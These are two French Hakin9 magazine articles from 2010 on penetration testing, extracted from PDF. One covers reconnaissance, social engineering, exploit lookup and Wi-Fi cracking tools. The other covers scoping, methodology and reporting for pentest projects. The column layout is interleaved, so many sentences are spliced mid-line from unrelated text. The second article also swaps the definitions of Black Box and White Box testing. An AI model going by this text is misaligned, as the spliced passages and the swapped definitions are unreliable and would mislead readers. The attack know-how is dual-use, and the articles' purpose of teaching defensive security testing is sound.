de l’entreprise. Seule une connexion à plus régulièrement de phishing, de spam pénétration système ?
internet lui est fournie et, de là, il doit tenter etc. mais qu’en est-il vraiment de cette Des statistiques nous ont montré qu’une
de récupérer le maximum d’informations menace ? attaque à l’aveugle sur un système
par n’importe quelle méthode (Internet, Les menaces internet sont en effet distant est dans 99% des cas totalement
Faille de sécurité sur les serveurs de moins en moins immédiatement inefficace. Il est absolument nécessaire
disponibles via le net, Social Engeniering, détectables. Là où, il y a cinq ans, la d’entamer une collecte d’informations
Phising, Reverse Engeniering, etc.). Il majorité des menaces consistaientt sur le système visé, dans le but d’élargir
s’agit du type de pénétration système à perturber visiblement l’utilisateur par ses possibilités d’attaques et de s’offrir
le plus demandé. Il existe deux types un déni de service, la suppression ainsi plus de flexibilité sur le choix des
de BlackBox, un internet et un externe. de fichiers ou l’envoi en masse de méthodes d’attaque. La stratégie est
Les BlackBox externes consistent à courriers électroniques (spam), les aussi importante que la manœuvre elle-
attaquer le système de l'entreprise "en nouvelles menaces hybrides apparues même.
aveugle", sans avoir aucune information ces dernières années ont pour principal La règle des 5P constitue le squelette
sur le matériel informatique et leurs objectif de ne pas être détectées. type de toutes les attaques informatiques
techniques de défense alors que les Cela est dû au fait que les menaces distantes.
BlackBox internes se font au sein des internet sont aujourd’hui le fait de Le premier P correspond à Probe qui
locaux de l'entreprise. En effet, le système véritables organisations criminelles qui peut se traduire par enquêter.
d'information peut être sécurisé de recherchent à tirer un bénéfice financier Savoir mener des recherches
l’extérieur et, malgré tout, être vulnérable de leurs attaques. Selon une étude efficaces sur Internet est la clé de la
depuis l'intérieur. réalisée en 2006 par IBM ISS X-Force, réussite. Personne n’a la science infuse,
GreyBox – Au cours de ce genre de
test, l’Ethical Hacker connaît un nombre
limité d’informations. Il peut par exemple
connaître l’adresse IP de l’ensemble des
serveurs, le plan d’adressage ou encore
les protocoles réseau utilisés au sein
de l’entreprise. Ce genre de pentest est
très intéressant car il permet de vérifier
la sécurité des infrastructures depuis
de l’intérieur (Les tests en GreyBox
sont également appelés des Internal
Testing). Une étude estime que 80% des
attaques réseau et des actes de piratage
proviennent de l’intérieur même de Figure 1 : Utilisation de Nmap

3/2010 HAKIN9 13

pentest.indd 13 2010-03-10, 15:52:54


DOSSIER
mais le rassemblement des masses de Connaître la situation géographique, Le social engineering
données sur un seul et même réseau les informations générales d'une société Le social engineering est une forme
permet à n’importe qui d’avoir accès à ou son fournisseur d'accès à Internet d'escroquerie principalement utilisée
n’importe quel savoir. sont peut-être des choses banales, mais en informatique pour obtenir un bien ou
Il existe de nombreux moyens de se pourtant à ne pas négliger. une information. Cette pratique exploite
renseigner sur la cible selon son type et Enfin, il est possible de récupérer l'aspect humain et social de la structure
selon les informations que nous désirons des informations sur les serveurs DNS à laquelle est lié le système informatique
récupérer. de l’entreprise grâce aux outils nslookup visé. Utilisant ses connaissances, son
Des techniques particulières de et dig. En effet, les enregistrements DNS charisme, l'imposture ou le culot, le pirate
recherches sur Internet comme le fournissent souvent de nombreuses abuse de la confiance, l'ignorance ou la
Google Hacking ont vu le jour avec informations utiles. crédulité de personnes possédant ce qu'il
l’importance qu’ont pris les moteurs de Concernant les applications web, il existe tente d'obtenir.
recherche. Le Google hacking est une également le site : http://www.archive.org/ Il est également possible de réaliser
technique consistant à utiliser un moteur web/web.php. Ce site référence d’anciennes du social engineering explicite sur le plan
de recherche, généralement Google, en versions des sites internet. Il est possible, en informatique. Ainsi, l’attaquant envoie
vue de chercher des vulnérabilités ou de travaillant sur d’anciennes versions, de trouver des mails aux employés de l’entreprise
récupérer des données sensibles. Cette des failles de sécurité qui n’auraient pas été en tentant de les piéger. En se faisant
technique s'appuie sur les résultats de corrigées mais simplement dissimulées. passer pour le service informatique ou
l'exploration et de l'indexation des sites L’explosion des réseaux sociaux permet une personne de confiance pour que le
internet par le robot Googlebot. également de récupérer des informations subterfuge fonctionne, l’attaquant joue
Il existe également de nombreuses beaucoup plus facilement que par le passé. alors sur la crédulité et la naïveté des
autres techniques que Google pour Leur force ne doit pas être négligée. employés.
trouver des informations sur le système La récupération d’information à partir Ce genre de technique est bien
cible comme interroger les bases Whois, d’internet est un élément clé puisqu'il souvent oublié alors que le facteur humain
par exemple. Le service Whois permet permet de récupérer de nombreuses dans une entreprise est sans aucun doute
d'effectuer des recherches sur les bases informations sur le système cible et cela, l’élément le plus faillible.
de données des noms de domaine. sans avoir à dévoiler son identité. En effet, Une excellente technique pour
La récupération des adresses email ce genre de récupération d’information mettre en place du social engineering
sur la toile permet également de lancer est dite passive car le système cible fondé sur l’informatique est décrite à
des attaques de type phishing afin n’a aucune possibilité de savoir qu’une l’adresse suivante : http://www.offensive-
d’accroitre nos privilèges ultérieurs. attaque se prépare. s ecur i t y. com /metas ploi t- unleas hed /
Social-Engineering-Toolkit

Recherche d’information
active
Après avoir vu la recherche d’information
passive par les moteurs de recherche et
internet dans sa généralité, nous allons
passer à des méthodes dites actives.
A l’inverse des méthodes dites passives,
ces nouvelles méthodes laissent des
traces sur le réseau cible permettant de
remonter jusqu’à l’adresse IP de l’attaquant
grâce aux fichiers de log etc. Néanmoins,
cette étape est indispensable car elle
permet de révéler un nombre important
d’informations sur le système cible.
Commencer par lancer un balayage
de port grâce au célèbre Nmap sur le ou
les serveur(s) de l’entreprise permet de
détecter les ports ouverts sur la machine.
Cette prise d’empreinte révèle les services
tournant sur la machine cible et donne
donc les différents points d’entrée possible
Figure 2 : Utilisation d’Autoscan (voir Figure 1).

14 HAKIN9 3/2010

pentest.indd 14 2010-03-10, 15:53:02


TEST DE PÉNÉTRATION SYSTÈME

Un scan des ports sur une machine version d’Apache ou le type de serveur Ces logiciels détectent rapidement
distante montre les ports ouverts, ce qui FTP tournant sur la machine cible, il est une vulnérabilité dans un système-cible
peut aiguiller nos attaques. En effet, une nécessaire d’aller faire un tour sur le site mais ils restent énormément bruyants et
attaque sur un port protégé sera nettement http://www.exploit-db.com/ reprenant ont tendance à affoler un peu les fichiers
plus difficile. l’ancien site très connu qu’était Milw0rm, de log.
Dans notre exemple, nous pouvons voir pour vérifier l'existence connue d'une faille Le logiciel Metasploit est également un
que le port 79 est ouvert, ce qui peut être dans cette version. logiciel en vogue actuellement car il devient
une très bonne chose pour toute collecte Dans le cas où le logiciel/service de plus en plus simple à utiliser et est de
d’information. En effet, le port 79 est un est vulnérable, il est facilement possible plus en plus documenté, notamment
utilitaire Internet qui permet à quelqu'un de trouver l’exploit accélérant ainsi grâce à ce lien : http://www.offensive-
d'obtenir des informations sur vous, grandement votre exploitation. security.com/metasploit-unleashed/
y compris votre nom complet, votre login et Dans l’éventualité où nous découvrons Le logiciel Metasploit permet, quant à lui,
autres informations de profilage. sur l’une des machines-cible un serveur d’exploiter des vulnérabilités découvertes
De plus, le port 80 est également Apache muni du module Tomcat dans sa grâce aux logiciels précédemment cités.
ouvert nous renseignant qu’un site version 1.2.19, il est possible d’y exécuter
internet est très probablement en cours un Buffer Overflow à distance. http:// Les applications web
de fonctionnement dessus. Cela ne nous www.exploit-db.com/exploits/6100 De nombreuses possibilités s'offrent à
donne pas d’information sur le site en lui- Cela permet d'accéder à une machine vous si le système dispose d'un serveur
même mais nous permet d’élargir notre rapidement et sans laisser de nombreuses web sur le même réseau. Le service web
champ de vision et donc, d’augmenter la traces dans les fichiers de log. est l'un des plus exploités des Hackers et
superficie de l’attaque. Des outils tels que Nessus, FastTrack, débutants. Ainsi, il est primordial d'avoir
NOTE : Il est important de se rappeler Saint, CoreImpact ou encore OpenVAS une bonne sécurité. D'autant plus que la
que plus le nombre d’entrées dans un détectent les vulnérabilités sur un système- sécurité d'un site web est beaucoup plus
réseau informatique est important, plus cible distant. Ils signalent les faiblesses mise en péril en raison du grand nombre
cela laisse de possibilités à l’attaquant. En potentielles ou avérées sur les machines- d'attaquants qui préféreront ce type
outre, cela augmente également le travail cible en incluant les services vulnérables d'attaque à la recherche d'autres failles
de l’administrateur qui doit défendre tous à des attaques permettant la prise de dans le système.
les points simultanément. contrôle de la machine, l'accès à des La plupart, pour ne pas dire la totalité
A l’intérieur-même du réseau, l’outil informations sensibles, les fautes de des failles présentes sur le web sont
Autoscan (voir Figure 2) lance une série de configuration, les patchs de sécurité non dues à une mauvaise programmation
scan pour trouver toutes les machines et appliqués, les mots de passe par défaut, du service proposé. De multiples
tout matériel (routeur, pare-feu...) connectés. quelques mots de passe communs et vulnérabilités sont connues à ce jour,
Ses principales caractéristiques sont l'absence de mots de passe sur certains telles que les injections SQL, les failles
la reconnaissance des systèmes comptes-système etc. CSRF, etc.
d'exploitation de ses hôtes et une série
d'informations intéressantes (ports
ouverts, nom de la machine, détection de
ressources partagées,...).
Il est à présent possible de connaître
toute la structure du réseau allant des
machines hôtes aux Access Point Wifi en
passant par les routeurs.

Utilisation des informations


Utilisons maintenant ce maximum
d’informations maintenant récupérées
grâce à internet et aux scans de ports.
Cependant, ce n’est toujours pas le
moment d’attaquer directement le serveur
à l'aide d'outils automatisés.
Nous allons plutôt préparer une attaque
un peu plus intelligente en ne révélant que
peu notre présence.
Après avoir récupéré des informations
via Nmap comme, par exemple, la Figure 3 : Wapiti détecte des failles XSS

3/2010 HAKIN9 15

pentest.indd 15 2010-03-10, 15:53:10


DOSSIER
nombreuses données confidentielles.
La main-mise sur ce genre de données
s’avérerait excessivement grave.
En règle générale, les failles de sécurité
dans les applications web se trouvent dans
les points d’entrée laissés à l’utilisateur,
comme des formulaires par exemple.
Les vulnérabilités se recherchent
par scan manuels ou à l'aide d'outils
Figure 4 : Utilisation de la suite aircrack-ng automatisés. Des outils propriétaires tels
qu’AppScan et Acunetix ou des outils libres
Outre le fait que l'attaquant peut L'attaquant présumé teste alors tout le site tels que Wapiti et Nikto réalisent ce travail.
parfaitement élever ses droits sur le site, il : URL, formulaires et variables principalement
lui est également possible selon les failles, (requêtes GET, POST), en-têtes, etc. Les réseaux sans fil
d'élever ses droits sur le système complet, Aujourd’hui, les applications web La démocratisation des appareils Wifi
pouvant ainsi le corrompre aisément. Il évoluent sans cesse, tant en nombre (Wireless Fidelity) a grandement simplifié
doit pour cela avoir une maîtrise parfaite qu’en importance. En effet, nous pouvons le déploiement des petits réseaux
du protocole de communication mis à maintenant trouver des sites de paiement professionnels et domestiques. Grâce à
disposition, en l'occurrence, HTTP pour un en ligne, des banques et de nombreuses cette technologie disposant d'un support
site web. autres applications disposant de très de plus en plus intégré dans les divers

Tableau 1. Tableau des sociétés offrant des services sur Audit de sécurité
société adresse web sur le marché depuis tests de pénétration audit de sécurité

Free Security www.freesec.com 2002 NON OUI

High Tech Bridge http://fr.htbridge.ch/ 2007 OUI OUI

HSC www.hsc.fr 1989 OUI OUI

Intrinsec www.intrinsec.com 1995 NON OUI

Itrust www.itrust.fr 2006 OUI OUI

JA-PSI www.ja-psi.fr 2007 OUI OUI

Kleverware http://www.kleverware.com/ 2005 NON OUI

NBS System www.nbs-system.com/ 1999 NON OUI

No-Sec www.no-sec.com 2005 OUI OUI

Novatiom http://www.novatim.com/ NON OUI

Oppida http://www.oppida.fr 2005 NON OUI

SecWay www.secway.fr 2000 OUI OUI

SCRT www.scrt.ch 2002 OUI OUI

Secur-toile www.securi-toile.com 2008 OUI OUI

Sogeti http://esec.fr.sogeti.com/ OUI OUI

Sysdream www.sysdream.com 2004 OUI OUI

TOONUX http://www.toonux.com/ OUI OUI

Wargan www.wargan.com OUI OUI

Xmco Partners www.xmcopartners.com/ 2002 OUI OUI

16 HAKIN9 3/2010

pentest.indd 16 2010-03-10, 15:53:17


équipements, de nombreux appareils
informatiques (ordinateurs, consoles, PDA,
etc.) s'interconnectent sans avoir à réaliser
le moindre perçage ni passer le moindre
câble. Poussés par cette relative simplicité
d'installation ainsi que par des prix très
abordables, les réseaux sans fil ont rencontré
leur succès actuel. Ce succès du sans fil
entraine la vulgarisation des attaques contre
ces réseaux conduisant ainsi à parler d’une
nouvelle génération de hackers appelés
WHacker pour Wireless Hacker.
La suite Aircrack-ng n’est plus à
présenter en raison de son engouement
et sa facilité d’utilisation à faire parler d’elle
(voir Figure 4).
En effet, il est facile de cracker des
protections de types WEP en moins d’une
minute et les protections WPA et WPA2
commencent à être mises à mal.
Même si cette technologie est plus
apparentée aux téléphones mobiles, les
réseaux sans fil comportent également
les réseaux Bluetooth. Leur expansion
commence à être importante.

Conclusion
Un test de pénétration système est un test
à réaliser régulièrement, permettant d’avoir
une estimation sur la sécurité de votre
système d’information. En règle générale,
une société externe prendra en charge
cette tâche car les employés-même
de l’entreprise travailleraient avec une
connaissance de l’entreprise, ce qui n’est
pas adapté à un test vraiment impartial.
Cet article donne les pistes à suivre
pour le commencement d’un test
d’intrusion mais ne peut être un guide pour
l’ensemble des pentest. En effet, les pentest
différent de par les enjeux des données à
protéger, les services qu’il est possible de
trouver sur les machines cibles etc.
N’hésitez pas à régulièrement faire valider
la sécurité de votre système informatique par
des audits de sécurité ainsi que des tests de
pénétration système.

Auteur
Régis SENET est étudiant en cinquième année à l’école
Supérieur d’informatique Supinfo. Passionné par les
tests d’intrusion et les vulnérabilités web, il tente
de découvrir la sécurité informatique d’un point de vue
entreprise. Il s'oriente actuellement vers les certifications
Offensive Security et CEH.
Contact : regis.senet@supinfo.com
Site internet : http://www.regis-senet.fr

12_17___pentest.indd 17 2010-03-10, 16:00:11


DOSSIER
SEBASTIAN STROIK

Test de
pénétration
Organisation du projet
Degré de difficulté Puisque presque tous les numéros de notre magazine décrivent
les méthodes d'analyse de vulnérabilité, d'identification des
attaques, d'utilisation des fragments de code pour des activités
destructrices, le présent article se concentrera sur la bonne
organisation du projet, à savoir des tests de pénétration. Nous
décrirons les meilleures pratiques relatives à la gestion de projets
de tests de pénétration

D
urant les dernières années, le nom- Voici des exemples de protection (technique)
bre de systèmes et de services infor- permettant d'augmenter le niveau de sécurité :
matiques utilisés dans les entreprises
a considérablement augmenté. Parallèlement • possibilité de travailler avec un système cen-
à l'augmentation des systèmes, la quantité tral d'identification d'informations,
d'informations traitées s'est également agrandie. • possibilité de contrôler les modifications
Comme nous le savons tous, l'information est dans l'utilisation des systèmes d'exploitation,
une des activités les plus précieuses dont les des applications et d'autres types de
entreprises disposent. Pour cette raison, il est logiciel,
important qu'elle soit protégée convenablement. • possibilité de travailler avec le système
Tout le monde attend des systèmes informa- central d'aide à la gestion et à la collecte
tiques qu'ils répondent aux exigences relatives d'informations relatives aux incidents con-
à la confidentialité, à l'intégrité et à la disponibil- cernant la sécurité du système informatique,
ité des informations qui y sont traitées. Voici les • possibilité de gérer de manière centralisée
définitions des termes susmentionnées selon la et à distance des dispositifs de contrôle de
norme ISO/IEC 13335-1:2004 : transmission et d'accès, des modifications
ACL et autres (par exemple, en séparant le
• disponibilité – propriété de ce qui est acces- segment VLAN dédié pour ce type de dis-
CET ARTICLE EXPLI- sible et utilisable à la demande par une entité positifs),
QUE... autorisée, • possibilité de diviser le réseau d'institutions
Comment mener en pratique un • confidentialité – se dit d'une information qui physiquement/logiquement (par exemple,
projet de tests de pénétration
dans votre entreprise, n'est pas rendue disponible ni révélée à des segments VLAN),
comment définir correctement
personnes, des entités ou des processus non • possibilité de créer des copies de sauve-
l'objectif et l'étendue du projet, autorisés, gardes d'informations ; ces copies sont
à quoi faut-il faire attention, • intégrité – la propriété de conserver et gérées et réalisées de manière centrale,
quelles méthodologies utiliser, d'assurer l'exactitude et la complétude d'une • possibilité de se protéger de manière cent-
ce qu'un rapport de tests de information. rale et distribuée (avec une gestion centrale)
pénétration doit contenir. contre les logiciels malveillants comme : vi-
En pratique, répondre aux exigences ci-dessus rus informatiques, vers de réseau, chevaux
CE QU'IL FAUT
SAVOIR... signifie mettre en place des protections tech- de Troie, bombes logiques, etc.,
niques et organisationnelles appropriées dans les • possibilité de surveiller de manière centrale
Vous devez avoir des notions de
base sur la sécurité. solutions conçues. les journaux des opérateurs/des événe-

18 HAKIN9 3/2010

18__22____test_penetr.indd 18 2010-03-10, 16:02:58


TESTS DE PÉNÉTRATION

ments des éléments choisis d'un


réseau dans l'entreprise (par exem- Exemple de projet effectué pour un client X de la
ple, évalués comme critiques et im-
portants lors d'analyse de risques),
branche utilities
de suivre l'accès au système et de Objectif du projet :
l'utiliser (par exemple, accessibilité Vérification du niveau de la sécurité des systèmes de traitement des données personnelles

des ressources réseau), Étendue/Étapes du projet :


• possibilité de synchroniser les horlo- (tableau 1)
ges de tous ou partie des éléments
Description de la réalisation du projet :
d'un réseau dans l'entreprise, Le projet X se concentre sur la vérification du niveau de la sécurité des systèmes de traitement
• possibilité aux dispositifs ou aux élé- des données personnelles du client. Le projet a été lancé suite à la mise en place de nouvelles
ments choisis d'un réseau de serv- protections techniques dans la zone IT.
ices (d'après l'analyse de réseau) de Le projet a été divisé en deux étapes :
travailler en mode appelé failover.
• analyser la vulnérabilité aux attaques des systèmes directement depuis Internet,
• possibilité d'utiliser des protections • analyser la sécurité des systèmes de traitement des données personnelles.
cryptographiques par rapport aux
informations stockées, envoyées ou L'objectif de l'étape 1 consiste à détecter toutes les vulnérabilités possibles permettant à compro-
mettre les serveurs qui se trouvent dans la zone DMZ.
aux lecteurs d'informations (par ex-
Le rapport de l'étape 1 présente les vulnérabilités détectées et définit les possibilités de
emple, utilisation de VPN ou autres
les utiliser par un attaquant et recommande par la suite les protections indispensables pour
solutions fondées sur PKI), supprimer les risques détectés.
• possibilité de travailler avec le sys- L'objectif de l'étape 2 consiste à vérifier si la sécurité des systèmes est conforme aux princi-
tème central de gestion d'accès des pes de sécurité définis et en vigueur dans l'entreprise. Le rapport de l'étape 2 présente les irrégu-
utilisateurs larités trouvées et recommande les manières de les supprimer.
• possibilité de contrôler à distance Conclusion :
des connexions réseau, de forcer les Dans le projet décrit, le client a décidé de ne pas effectuer des tests de pénétration stricts. Il s'est
voies de connexion et l'identification concentré sur la question de vulnérabilité et d'élimination des menaces trouvées. De plus, une
d'un ordinateur, d'un terminal ou d'un analyse de sécurité des systèmes interne a été réalisée. L'objectif défini dans le projet a été at-
teint.
autre périphérique réseau.
L'étendue du projet est différente à chaque fois et dépend des besoins du client. Voici les
raisons les plus fréquentes pour mettre en place des projets liés à la réalisation des tests de
Les protections organisationnelles sont pénétration :
mises en place dans tous les endroits où
il est impossible d'implémenter les protec- • mise en place de nouvelles protections techniques et organisationnelles,
tions techniques appropriées. • mise à jour les logiciels (versions de logiciels, actualisations),
• incident de sécurité,
Afin de vérifier si les exigences
• recommandation d'audits,
relatives à la sécurité définies dans • etc.
l'entreprise ont été correctement mises
en place, il faut effectuer des audits de
sécurité. Il est important qu'ils soient Tableau 1. Etapes du projet
réalisés régulièrement. Chaque audit N° Étapes du projet Délai de réalisa- Outils
doit être suivi d'une rédaction d'un rap- tion
port. Ce rapport décrit les irrégularités 1 Analyse de la vulnérabilité de 1 semaine depuis la Nessus, Nmap
observées et il propose des actions de l'extérieur signature du contrat
prévention et de correction à effectuer
lors de contrôles suivants.
Pour vérifier si les actions de préven-
tion et de correction ont été correctement 2 Analyse de la sécurité des sys- 2 semaines depuis Analyse de la con-
réalisées lors de l'audit de vérification, il tèmes de traitement des données la signature du figuration, contrôle
faut mettre en place des mesures per- personnelles contrat technique avec les
mettant de définir le niveau de sécurité administrateurs des
systèmes
des systèmes analysés.
N'oubliez pas que ce processus doit 3 Rapport des étapes 1 et 2 4 semaines depuis ND
être suivi continuellement. Il est impossi- la signature du
ble d'éliminer les risques à 100 %. Nous contrat
ne pouvons que réduire la possibilité du
risque. Pour s'assurer du niveau de sécu-

3/2010 HAKIN9 19

18__22____test_penetr.indd 19 2010-03-10, 16:03:06


DOSSIER
rité, il faut continuellement suivre vos sys- Les scénarios de tests de pénétration • classement de travaux,
tèmes. sont déterminés par tous. • conditions de travail avec les adminis-
Les tests de pénétration constituent Toutes les actions à ef fectuer sont trateurs de systèmes.
un outil efficace permettant d'analyser le fixées avant de procéder aux tests,
niveau de sécurité de l'entreprise. notamment définir en particulier les Pendant les tests internes :
Ces tests, en plus des techniques procédures de restitution des données,
d'analyse de vulnérabilité et de contrôle, ef fectuer des copies de sauvegarde des • nous analysons les mises à jour des
constituent l'un des outils d'audit les plus données, déterminer la durée de tests serveurs et des ordinateurs du point de
fréquemment utilisés. et les manières de communication en- vue,
Nous décrirons ci-dessous les meil- tre les administrateurs du département • nous vérifions les périphériques ré-
leures pratiques relatives à la réalisation IT du client et l'équipe de test, définir seau,
des tests de pénétration. en détails l'étendue du projet (manière • nous effectuons les tentatives :
Les tests de pénétration sont réalisés d'ef fectuer les tests, types des tests réal- d'interception d'informations, pour ac-
soit par une personne ou une équipe isés, étendue de l'analyse – adresse IP, céder et disposer des droits supérieurs
chargée de projet dans l'entreprise du cli- etc.) dans le système informatique.
ent, soit par une société externe spécial-
isée dans les questions de ce type. Scénario de test Lors du choix de l'étendue des tests, il
Avant de procéder aux tests, il est Le scénario de test dépend bien évidem- faut prendre en considération les sys-
nécessaire de signer une clause de con- ment du modèle de test accepté. tèmes de production. Il faut réfléchir s'il
fidentialité pour protéger les deux parties Les noms populaires Black Box, White est nécessaire d'effectuer une attaque
contre d'éventuelles conséquences de vio- Box et Grey Box signifient tout simplement ou bien créer un environnement de test.
lation des conditions de travail. l'étendue des connaissances de l'auditeur Si nous optons pour un système de pro-
En démarrant un projet, il est néces- lors des tests de pénétration. duction, est-il suffisamment protégé en
saire de définir en détails son objectif, son cas de panne. Est-ce qu'une copie de
étendue et la méthodologie et de préciser • Black Box – signifie que l'auditeur dis- sauvegarde a été faite, est-ce que la
l'étendue du rapport. pose de connaissances complètes sur tentative de restitution a été réussie ? Si
les ressources du client. Ce type de le système est géré par une entreprise
Objectif et étendue du projet tests s'effectue par exemple lors des externe, avons-nous un niveau SLA suf-
Nous déterminons l'objectif du projet pour tests des applications ou de l'analyse fisant pour restituer des services dans le
vérifier qu'il a été atteint une fois le projet d'un système ou d'une application con- délai prévu ?, etc.
terminé. crète,
Le test peut avoir pour but, entre autres, • White Box – signifie qu'il ne dispose Méthodologie du projet
l'analyse de la conformité du système aux d'aucune connaissance sur les res- Suivre de manière continue le niveau de
exigences définies soit par le client, soit sources. Les tests du type White Box sécurité des organisations des systèmes
par les organisations mondiales chargées sont liés le plus souvent à l'audit effec- informatiques permet de l'analyser ef-
de sécurité, par exemple, norme ISO/IEC tué à l'extérieur de l'organisation, ficacement. Les tests de pénétration
27001:2005. • Grey Box – signifie une tentative de doivent s'effectuer périodiquement. Il est
Un autre but serait l'analyse de la vul- simulation d'attaque de l'intérieur de possible de réaliser des tests partiels,
nérabilité ou de la tentative d'attaque pour l'organisation, par exemple, en utilisant par exemple, d'analyser périodiquement
accéder aux ressources. les droits standard d'utilisateur. la vulnérabilité du réseau, du Wi-Fi ou
L'analyse de la vulnérabilité est liée le du bluetooth etc. Quelque soit la zone
plus souvent aux tests automatiques. Elle Le scénario de test définit les étapes d'audit analysée, il faut définir les manières de
nous permet de détecter des failles et des et leur franchissement. =Ppréalablement à réaliser les tests, autrement dit, il faut dé-
risques connus dans les systèmes ana- la réalisation des tests, la procédure d'audit cider de la nécessité ou non de définir/
lysés. Le projet se termine à cette étape. sera vérifiée et le scénario de test sera ac- d'adapter la méthodologie de leur réali-
Les tests de pénétration complets cepté par les deux parties. sation.
constituent une réelle tentative d'attaque. Le scénario des tests externes doit Adapter une méthodologie appro-
À l'étape de collecte des informations, la contenir : priée est important pour plusieurs rai-
vulnérabilité des systèmes est analysée et sons. Premièrement, les tests seront
l'éventuelle utilisation malveillante de leurs • analyse des ordinateurs et péri- effectués à un bon niveau. Nous serons
failles est examinée. phériques réseau, certains que les tests seront réalisés
Comme dans tous les projets, des • définition des types de tests à lancer selon la méthodologie choisie quelque
personnes responsables du projet sont (par exemple, analyse de la vulnéra- soit le choix du fournisseur. Deuxième-
désignées tant du côté du client que du bilité DoS seulement pour les tests de ment, elle permettra de comparer le test
côté de l'équipe de test. l'extérieur), effectué au test précédent en ajoutant

20 HAKIN9 3/2010

18__22____test_penetr.indd 20 2010-03-10, 16:03:13


TESTS DE PÉNÉTRATION

des mesures appropriés. Standardiser la tront d'effectuer des tentatives d'attaque. amap, xprobe2, sinfp, nbtscan, netenum,
manière de réalisation des tests permet Cette étape commence le plus souvent fping.
également de choisir les prestataires par une collecte passive des informa- À part l'opération de scanne des ports
d'une manière plus souple. Nous ne tions. Nous utilisons ici des requêtes des à l'étape de reconnaissance, nous utilisons
dépendons plus de la même équipe ou ressources Internet disponibles, telles que une série d'outils automatiques pour ana-
entreprise spécialisée dans les tests de noms de domaines, moteurs de recherche lyser la vulnérabilité. Les outils les plus con-
pénétration. Internet, annuaires téléphoniques, groupes nus et les plus souvent utilisés s'appellent
Il est possible de créer notre propre de discussion, profils sur les portails com- Nessus, MaxPatrol et NGS Typhon. Ces
méthodologie de réalisation des tests munautaires, etc. De plus, nous vérifions programmes servent à analyser la sécurité
de pénétration ou d'utiliser l'une des les informations contenues dans les en- du réseau du point de vue de la présence
méthodologies connues conçues par les registrements DNS. des failles ou des erreurs connues dans la
organisations chargées de la sécurité no- Ensuite, nous passons à la collecte configuration du logiciel. Les scanneurs se
tamment : ISACA, ISECOM, OWASP, NSA, active des informations. Cette étape con- prêtent très bien à l'identification des ports
CESG, NIST, WASC, etc. siste le plus souvent à scanner les ports et des services actifs.
Voici quelques méthodologies choisies et à utiliser des outils plus invasifs chargés Les informations collectées à l'étape
pour effectuer des audits des systèmes in- d'analyser la vulnérabilité par exemple en de reconnaissance relatives aux failles
formatiques : employant l'énumération. et aux menaces découvertes permettent
Scanner les ports consiste à faire des d'effectuer une attaque. L'attaque consiste
• Open Source Security Testing Meth- tentatives de connexion sur les ports d'un à préparer un programme approprié (un
odology v 3.0 – méthodologie conçue ordinateur donné afin de lister les services exploit) qui utilise la vulnérabilité détectée.
par l'organisation ISECOM (Institute actifs. L'énumération consiste en revanche Lancer les exploits vise à prendre le con-
for Security and Open Methodolo- à se connecter à un port précis et à faire trôle sur le système ou à bloquer son activ-
gies), une commande permettant d'obtenir des ité (attaque du type DoS). Il existe plusieurs
• Nist 800-42, 800-115 – plan-type informations souhaitées. outils qui lancent automatiquement les
conçu par l'organisation NIST (Nation- Les outils les plus fréquemment uti- exploits mais il ne s'agit que d'outils aux-
al Institute of Standards and Technol- lisés à cette étape sont Nmap, netcat, iliaires.
ogy),
• OWASP Testing Guide v3 – manuel
du testeur de sécurité comprenant Sur le Net
les meilleures pratiques relatives à Organisations chargées de sécurité
la sécurité des applications Web,
• ISACA – Information Systems Audits and Control Association – http://www.isaca.org/,
conçu dans le cadre du projet OW-
• ISECOM – Institute for Security and Open Methodologies – http://www.isecom.org/,
ASP (Open Web Application Security
• OWASP – Open Web Application Security Project community – http://www.owasp.org/
Project), index.php/Main_Page
• BSI Penetration Testing Model – • NSA – National Security Agency – http://www.nsa.gov/.
méthodologie pour réaliser des tests • CESG – http://www.cesg.gov.uk/
proposée par BSI (Bundesamt fur • NIST – National Institute of Standards and Technology – http://csrc.nist.gov/,
Sicherheit in der Informationstech- • WASC – Web Application Security Consortium – http://www.webappsec.org/.

nik) Quelques méthodologies pour effectuer des audits informatiques

• Open Source Security Testing Methodology Manual – OPSSTM – http://www.isecom.org/


Les méthodologies susmentionnées, mise
osstmm/,
à part la définition détaillée des techniques
• NIST Guideline on Network Security Testing – http://csrc.nist.gov/publications/nistpubs/800-
de test, définissent également les princi- 42/NIST-SP800-42.pdf,
pes de plan, de rapport et d'évaluation des • OWASP Testing Guide v.3 – http://www.owasp.org/index.php/Category:OWASP_Testing_
résultats. Project ,
Quelque soit la méthodologie adap- • BSI Penetration Testing Model – http://www.bsi.de/english/publications/studies/
penetration.pdf,
tée, les tests techniques peuvent être di-
visés en deux étapes : reconnaissance et Outils
tentatives d'attaque. Nous décrirons les
• Top 100 Network Security Tools – http://sectools.org/,
outils les plus fréquemment utilisés lors
• BackTrack – http://www.remote-exploit.org/backtrack.html.
de ces étapes.
• Bases de vulnérabilité
• NVD – National Vulnerability Database – http://nvd.nist.gov/,
Outils • CVE – Common Vulnerabilities and Exposures – http://cve.mitre.org/,
L'étape de reconnaissance vise à collecter • CVSS – Common Vulnerability Scoring System – http://first.org/cvss/.
le plus d'informations possible qui permet-

3/2010 HAKIN9 21

18__22____test_penetr.indd 21 2010-03-10, 16:03:20


DOSSIER
Parmi les outils les plus populaires se ors une division en trois ou quatre degrés la durée des tests et leur coût. L'analyse
trouvent notamment Metasploit, Canvas, In- (critical, high, medium, low). de vulnérabilités dure entre une et deux
guma, SQL Power Injector, Security Forest, Prendre seulement un seul indicateur journées alors que les tests de pénétra-
Core Impact etc. pour évaluer les menaces trouvées est tion prennent parfois jusqu'à plusieurs
Les connaissances et l'expérience de insuffisant. À part l'indicateur qui définit le semaines.
l'équipe de test sont les points les plus degré de risque, il faut également prendre D'autre part, pour analyser l'efficacité
importants lors de la réalisation de ce- en compte la probabilité de son apparition du système de détection d'attaque mis en
tte étape de tests de pénétration. Lors de par rapport à l'objet analysé. place (IDS/IPS), il faut opter pour une simu-
certains types d'attaque, les attaquants Nous pouvons pré-évaluer le niveau lation de l'attaque et donc l'approche du
écrivent souvent leurs propres scripts ou de sécurité des systèmes et des appli- type White Box.
fragments de code. cations analysés d'après les mesures Hormis le choix du type et de l'étendue
adaptées. des tests, il faut également définir la
Rapport Prendre des mesures fixes permet en fréquence de leur lancement. Les grandes
Le rapport de tests décrit les résultats des plus de comparer les résultats de rap- entreprises prévoient souvent un calen-
travaux liés à la réalisation du projet. Les ports. Il est impossible de définir si le sys- drier d'audits où les tests de pénétration
informations présentes doivent répondre tème ou l'application en question ont été sont présents. Nous vous conseillons de
à la question : est-ce que l'objectif du projet rendus plus performants sans répéter les penser à faire des tests directement après
